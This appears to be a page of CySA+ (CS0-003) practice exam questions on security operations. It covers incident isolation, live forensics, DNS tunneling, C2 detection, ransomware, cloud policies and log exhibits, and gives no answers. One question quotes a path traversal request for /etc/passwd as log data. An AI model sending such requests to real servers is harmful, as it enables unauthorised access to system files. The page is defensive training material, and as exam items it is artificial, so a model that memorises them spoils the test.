An organization's incident response playbook specifies that after a confirmed malware infection, the infected system should be isolated from the network. Which action best achieves isolation?

Question 143hardmultiple choice
Read the full Security Operations explanation →

A forensic analyst is called to acquire data from a live server that is critical to business operations. The server cannot be powered down. Which acquisition method should the analyst use to minimize alteration of volatile data?

Question 144mediummultiple choice
Read the full Security Operations explanation →

A SOC analyst is reviewing logs from a web server and sees the following request: GET /../../etc/passwd HTTP/1.1. Which type of web attack is this?

Question 145easymultiple choice
Read the full Security Operations explanation →

A security engineer needs to implement a baseline configuration for all new Linux servers. Which of the following should be included in the baseline to reduce the attack surface?

Question 146hardmultiple choice
Read the full DNS explanation →

During a threat hunting exercise, an analyst formulates a hypothesis that an attacker may be using DNS tunneling to exfiltrate data. Which data source would provide the best evidence to confirm or deny this hypothesis?

Question 147easymulti select
Read the full Security Operations explanation →

Which TWO of the following are common indicators of compromise (IOCs) that can be identified through log analysis?

Question 148mediummulti select
Read the full Security Operations explanation →

Which THREE of the following are essential tools and technologies used in a Security Operations Center (SOC) for monitoring and detection?

Question 149hardmulti select
Read the full Security Operations explanation →

An organization has identified a ransomware outbreak on several workstations. Which TWO actions should the incident response team take immediately?

Question 150mediummultiple choice
Read the full Security Operations explanation →

Based on the exhibit, which type of issue is most likely affecting the server's network performance?

Exhibit

Refer to the exhibit.

```
ethtool -S eth0 | grep -E "(rx_crc_errors|rx_fifo_errors|rx_frame_errors)"
rx_crc_errors: 2451
rx_fifo_errors: 12
rx_frame_errors: 892
```

An analyst is investigating network performance issues on a Linux server. The exhibit shows output from ethtool.
Question 151hardmultiple choice
Read the full Security Operations explanation →

What is the net effect of the policy shown in the exhibit on requests from an IP address in the 10.0.0.0/8 range?

Exhibit

Refer to the exhibit.

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::confidential-data/*",
      "Condition": {
        "IpAddress": {
          "aws:SourceIp": "10.0.0.0/8"
        }
      }
    },
    {
      "Effect": "Deny",
      "Action": "s3:*",
      "Resource": "arn:aws:s3:::confidential-data/*"
    }
  ]
}
```

A security analyst is reviewing an S3 bucket policy for an AWS environment.
Question 152hardmultiple choice
Read the full Security Operations explanation →

You are a senior security analyst at a mid-sized financial company. The SOC has been alerted by the EDR system about anomalous behavior on a domain controller (DC) that runs Windows Server 2019. The alert indicates that a process named 'svchost.exe' spawned a PowerShell process that executed a one-liner to connect to an external IP address (203.0.113.5) over TCP port 443. Further investigation shows that the DC's event logs have gaps of about 10 minutes each, and the local administrator account 'Administrator' was used to log in from a workstation named 'WKSTN-FIN-12' at the time of the event. The company has strict policies: all administrative access must be via dedicated jump hosts, and privileged accounts are monitored. Upon checking, 'WKSTN-FIN-12' is assigned to an employee in the finance department who has no administrative privileges. The employee reports that they did not log in recently. The CISO wants a swift containment and eradication without losing forensic evidence. Based on this scenario, which of the following is the BEST first course of action?

Question 153mediummultiple choice
Read the full Security Operations explanation →

A security analyst at a small company notices that several workstations in the finance department are communicating with an external IP address known to be associated with a command-and-control server. The analyst checks the host-based firewall logs and sees that outbound connections to that IP are allowed. Which of the following is the BEST immediate action to take?

Question 154hardmultiple choice
Read the full NAT/PAT explanation →

During a security assessment, you discover that an organization's web application is vulnerable to SQL injection because it concatenates user input directly into SQL queries. Which of the following is the BEST remediation strategy?

Question 155mediummulti select
Read the full Security Operations explanation →

A security analyst is reviewing logs from a network intrusion detection system (NIDS) and sees the following alert: "ET TROJAN Possible ZeuS/Poison Ivy Activity". The analyst wants to verify if the traffic is malicious. Which TWO of the following actions should the analyst take? (Select two.)

Question 156easymultiple choice
Read the full Security Operations explanation →

A small business with 50 employees uses a single Windows Server 2019 as a domain controller and file server. The company recently experienced a ransomware attack that encrypted all files on the server. The IT manager restored the files from a backup that was taken two days before the attack. However, the next day, the files were encrypted again. The analyst suspects the ransomware may have persisted or re-entered. The network is air-gapped from the internet, but employees use USB drives. Which of the following is the MOST likely reason for the re-infection?

Question 157mediummultiple choice
Read the full Security Operations explanation →

A security operations center (SOC) analyst is investigating an alert from the endpoint detection and response (EDR) system indicating that a process named "svchost.exe" spawned from a parent process "cmd.exe" on a user workstation. The user is a software developer who frequently uses command-line tools. The analyst checks the command line arguments: "cmd.exe /c powershell -EncodedCommand ...". The encoded command decodes to a script that downloads a payload from a remote server and executes it. The analyst also sees that the workstation has established an outbound connection to the same server on port 443. Which of the following is the BEST immediate action?

Question 158hardmultiple choice
Read the full VPN explanation →

A company uses a SIEM platform that ingests logs from various sources. The SOC team receives an alert for a high number of failed login attempts (over 100 in 5 minutes) on the domain controller from a single IP address. The analyst investigates and finds that the failed attempts are for multiple different usernames, including some disabled accounts. The source IP is traced to an external VPN service. The analyst also notices that a few accounts had successful logins from the same IP after the failed attempts. Which of the following is the MOST likely attack type?

Question 159easymultiple choice
Read the full Security Operations explanation →

A company uses a cloud-based identity provider (IdP) for single sign-on (SSO) to all applications. The SOC receives an alert that a user's account logged in from an IP address associated with a country where the company has no offices. The user is currently on a planned vacation and is not in that country. The analyst reviews the authentication logs and sees the login used a valid token and correct multi-factor authentication (MFA) method. Which of the following is the BEST initial step to handle this alert?

Question 160easymulti select
Read the full Security Operations explanation →

A security analyst is reviewing alerts from an IDS. Which TWO indicators are most likely to suggest a successful command and control (C2) communication? (Choose two.)

Question 161mediummultiple choice
Read the full Security Operations explanation →

Refer to the exhibit. A security analyst is reviewing firewall logs and notices this entry. What should the analyst do next?

Exhibit

# Firewall Log Entry
Time: 2024-03-15 10:23:45
Source IP: 10.10.1.50
Destination IP: 203.0.113.50
Source Port: 49152
Destination Port: 3389
Protocol: TCP
Action: ALLOW
Bytes Sent: 345678
Pkts Sent: 456
Question 162hardmultiple choice
Read the full Security Operations explanation →

A hospital's IT department has been receiving reports from nursing staff that the electronic medical record (EMR) system is responding slowly during peak hours. The network team has verified that the local area network is operating normally and there is no bandwidth congestion. The security analyst reviews the firewall logs and observes repeated outbound connections from the EMR server to an external IP address 198.51.100.23 on TCP port 443 at regular 5-minute intervals. Each connection transfers a small amount of data. The analyst also notes that the EMR server's antivirus software is up to date and no malware has been detected. The hospital's security policy requires that all outbound connections from critical servers be explicitly approved. Further investigation reveals that 198.51.100.23 is associated with a hosting provider in a foreign country. The analyst suspects a data exfiltration. Which of the following actions should the analyst take FIRST?

Practice tests

Scored 10-question sessions with instant feedback and explanations.

CS0-003 Practice Test 1 — 10 Questions→CS0-003 Practice Test 2 — 10 Questions→CS0-003 Practice Test 3 — 10 Questions→CS0-003 Practice Test 4 — 10 Questions→CS0-003 Practice Test 5 — 10 Questions→CS0-003 Practice Exam 1 — 20 Questions→CS0-003 Practice Exam 2 — 20 Questions→CS0-003 Practice Exam 3 — 20 Questions→CS0-003 Practice Exam 4 — 20 Questions→Free CS0-003 Practice Test 1 — 30 Questions→Free CS0-003 Practice Test 2 — 30 Questions→Free CS0-003 Practice Test 3 — 30 Questions→CS0-003 Practice Questions 1 — 50 Questions→CS0-003 Practice Questions 2 — 50 Questions→CS0-003 Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

Security OperationsVulnerability ManagementIncident Response and ManagementReporting and Communication

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Security Operations setsAll Security Operations questionsCS0-003 Practice Hub